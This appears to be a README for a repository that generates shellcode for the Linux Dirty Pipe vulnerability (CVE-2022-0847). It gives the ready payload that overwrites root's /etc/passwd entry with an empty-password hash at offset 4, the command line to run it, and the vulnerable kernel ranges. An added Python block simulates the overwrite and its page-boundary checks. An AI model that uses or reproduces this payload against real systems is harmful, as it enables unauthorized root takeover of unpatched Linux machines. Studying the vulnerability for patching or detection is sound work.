# cve_2022_0847_shellcode

## Description

This repository contains a Python script (``````), based on pwntools, that generates shellcode implementing [CVE-2022-0847]( <br>
The shellcode is based on this PoC: [antx]( <br>
I analyzed the PoC's code and traced its execution with strace to capture every system call the exploit needs. I first wrote a C program that uses ```syscall.h```; it is not directly usable as shellcode, but it is good for reference, so it is shipped here (```tiny_cve-2022-0847.c```). <br>
The function that generates the shellcode takes three parameters: the path of the file to write to, the data to write, and the offset at which the data must be written. <br>
An example of generated shellcode, as objdump disassembly, can be found in ```shellcode.asm```; it was generated with the following parameters:

- filename ```/etc/passwd```
- data ```:$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh\n```
- offset ```4```

With offset ```4``` the data overwrites everything from the ```x``` of ```root:x:0:0:...``` onward, so root is left with an empty password (the hash is MD5-crypt of the empty string). Note that whatever followed the original root line within the written range is clobbered as well, and, as with any CVE-2022-0847 write, the change lives only in the page cache until that page is evicted.
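The following is an added example, not the repository's script: it models what the three parameters do to the target file and the kind of sanity checks the README says ```cve_2022_0847``` performs. The constraints it checks are those of CVE-2022-0847 itself (the write patches one page-cache page, so it cannot start on a page boundary, cross a page boundary, or grow the file). The 4096-byte page size and the sample ```/etc/passwd``` content are assumptions constructed for the example; nothing is read from or written to the real system.

```python
# Added example (not the repository's code): models the (data, offset) write
# of the README's shellcode generator and the sanity checks it describes.
PAGE_SIZE = 4096  # assumption: x86-64 Linux default page size

# The README's example payload: from offset 4 of /etc/passwd it replaces
# "x:0:0:root:/root:/bin/bash" with an MD5-crypt hash of the empty string.
PAYLOAD = b":$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh\n"

# Constructed stand-in for /etc/passwd (not read from the real system).
SAMPLE_PASSWD = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)


def check_dirty_pipe_args(data: bytes, offset: int, file_size: int,
                          page_size: int = PAGE_SIZE) -> list:
    """Return the reasons the write cannot work (empty list if it can)."""
    problems = []
    if not data:
        problems.append("data is empty: nothing would be written")
    if offset < 0:
        problems.append("offset is negative")
    if offset % page_size == 0:
        # At least one byte of the target page has to be spliced into the
        # pipe before the payload, so byte 0 of a page cannot be overwritten.
        problems.append("offset is on a page boundary: the first byte of a "
                        "page cannot be overwritten")
    if (offset % page_size) + len(data) > page_size:
        problems.append("data would cross a page boundary: only one page "
                        "cache page is patched")
    if offset + len(data) > file_size:
        problems.append("data would extend the file: the write cannot "
                        "resize it (offset + len(data) > file size)")
    return problems


def simulate_overwrite(original: bytes, data: bytes, offset: int) -> bytes:
    """Return what the page-cache copy of the file looks like after the write.

    The file length does not change; whatever lay after the root entry
    (here the start of the daemon line) is clobbered, which is why a PoC
    should keep a backup of the original bytes to restore afterwards.
    """
    problems = check_dirty_pipe_args(data, offset, len(original))
    if problems:
        raise ValueError("; ".join(problems))
    return original[:offset] + data + original[offset + len(data):]


def example() -> bytes:
    """Apply the README's parameters to the constructed passwd content."""
    return simulate_overwrite(SAMPLE_PASSWD, PAYLOAD, 4)


if __name__ == "__main__":
    for line in example().splitlines():
        print(line.decode())
```

Running it prints the patched root line followed by the damaged remainder of the daemon line (```emon:/usr/sbin:/usr/sbin/nologin```), which is the part a real run would need to restore from a backup once a root shell is obtained.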

## Usage

$ python 
Usage: filename data offset [verbose (any value here sets verbose to True)]

You can import the function ```cve_2022_0847```, which generates the shellcode, to call it from other scripts, or use this script directly; there is an ```example_usage``` function that calls ```cve_2022_0847``` and builds an ELF containing the shellcode. <br>
```cve_2022_0847``` also performs some basic sanity checks on its parameters; if the ```verbose``` parameter is set, it prints what can go wrong with the exploit and the disassembled shellcode. <br>
It returns the assembled shellcode. The ```main``` function calls ```cve_2022_0847``` with the command-line parameters and prints the resulting shellcode as C-style hex escapes, i.e. without rendering printable bytes as characters. For example:

$ python /etc/passwd ":$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh\n" 4
Resulting shellcode:

## Disclaimer

Only ```amd64``` (x86-64 Linux) is supported. The target kernel must also be vulnerable to CVE-2022-0847: the bug was introduced in 5.8 and fixed in 5.16.11, 5.15.25 and 5.10.102.